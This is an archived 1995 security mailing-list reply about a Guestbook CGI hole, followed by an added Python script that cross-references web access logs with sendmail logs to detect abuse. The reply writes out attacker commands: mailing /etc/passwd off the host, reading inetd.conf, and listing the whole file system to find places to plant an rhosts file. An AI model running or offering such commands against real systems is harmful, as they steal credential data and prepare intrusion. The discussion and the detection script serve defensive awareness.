Re: SECURITY HOLE: "Guestbook"

That Whispering Wolf... (elfchief@lupine.org)
Fri, 4 Aug 1995 13:23:00 -0700

> Thanks for the alert.
>
> Aren't most servers configured to change to nobody/nogroup, only being
> launched as root so it can bind to port 80?  Looking at the code (ncsa
> httpd), all privs are given up as soon as the config file is read, when
> it does a setuid(user_id), the user_id, read from httpd.conf User and
> group entries, and usually set to be nobody and nogroup (UID 65534/GID
> 65534 on most systems).

Most servers do... But even then, cat /etc/passwd | Mail yourself@machine
will provide a list of possible accounts to attack, if not full encrypted
passwords.

cat /etc/inetd.conf... What possible holes do they have open?

ls -lR / -- Any user directories you could write an rhosts into?

I personally wouldn't want someone roaming around -my- system, even as
a non-privied user.

> Surely folks are not putting root in the httpd.conf User field...

Sure they are. There's some reeeeealy dense people out there. Not MANY,
mind you, but I (personally) have seen enough to realize it's a problem.

And, since POST forms don't write anything into the log other than the fact
that something was executed via method POST, the only trace you have is
your sendmail logs ... do you know _anyone_ that scrutinizes (sp?) their
sendmail logs on a regular basis? [yes, I realize asking that question on a
security mailing list is asking for trouble ... But you do get my point,
I'm sure].

Hell -- Do half the folks out there with web servers running as root even
know they HAVE sendmail logs?

                                                                        -WW
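The logging gap described above (the access log records only that a POST hit the CGI; the real trace, if any, is in sendmail's log) means the two logs have to be read together. The script below is an added example, not code from the original post or from NCSA httpd: it pairs CGI POSTs from an NCSA-style access log with messages the httpd User sent shortly afterwards, over constructed sample log lines, assuming the User is `nobody`, CGI lives under `/cgi-bin/`, and a 60-second correlation window.

```python
import re
from datetime import datetime, timedelta

# Constructed sample logs (not from the original post), both on the server's local clock:
# an NCSA-style access log and the syslog lines sendmail writes per message.
ACCESS_LOG = """\
10.0.0.7 - - [04/Aug/1995:13:20:01 -0700] "GET /guestbook.html HTTP/1.0" 200 1402
10.0.0.7 - - [04/Aug/1995:13:20:09 -0700] "POST /cgi-bin/guestbook HTTP/1.0" 200 512
10.0.0.9 - - [04/Aug/1995:13:41:30 -0700] "POST /cgi-bin/guestbook HTTP/1.0" 200 512
"""
SENDMAIL_LOG = """\
Aug  4 13:20:11 www sendmail[1234]: NAA01234: from=nobody, size=1840, class=0, relay=nobody@localhost
Aug  4 13:20:12 www sendmail[1235]: NAA01234: to=someone@example.org, stat=Sent
Aug  4 13:35:02 www sendmail[1301]: NAA01301: from=alice, size=212, class=0, relay=alice@localhost
"""

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
SENDMAIL_RE = re.compile(r'^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sendmail\[\d+\]: (\w+): from=(\S+?),')

def parse_posts(access_log, cgi_prefix="/cgi-bin/"):
    """Return (timestamp, client, path) for every POST to a CGI path."""
    posts = []
    for m in filter(None, map(ACCESS_RE.match, access_log.splitlines())):
        client, ts, method, path, _status = m.groups()
        if method == "POST" and path.startswith(cgi_prefix):
            # keep only the local timestamp; both logs are on the same local clock
            posts.append((datetime.strptime(ts.split()[0], "%d/%b/%Y:%H:%M:%S"), client, path))
    return posts

def parse_mail(sendmail_log, year):
    """Return (timestamp, queue_id, sender) per 'from=' record; syslog lines carry no year."""
    msgs = []
    for m in filter(None, map(SENDMAIL_RE.match, sendmail_log.splitlines())):
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        msgs.append((ts, m.group(2), m.group(3)))
    return msgs

def correlate(access_log, sendmail_log, httpd_user="nobody", window=timedelta(seconds=60)):
    """Pair each CGI POST with mail the httpd User (assumed 'nobody') sent within `window`.
    A hit is the trace the access log itself does not keep: a form submission that sent mail."""
    posts = parse_posts(access_log)
    year = posts[0][0].year if posts else datetime.now().year
    mail = parse_mail(sendmail_log, year)
    hits = []
    for p_ts, client, path in posts:
        for m_ts, qid, sender in mail:
            if sender == httpd_user and p_ts <= m_ts <= p_ts + window:
                hits.append({"client": client, "path": path, "queue_id": qid,
                             "delay_s": int((m_ts - p_ts).total_seconds())})
    return hits
```

On the sample data only the first POST is followed by mail from `nobody`; the later message from `alice` is an ordinary user and is ignored.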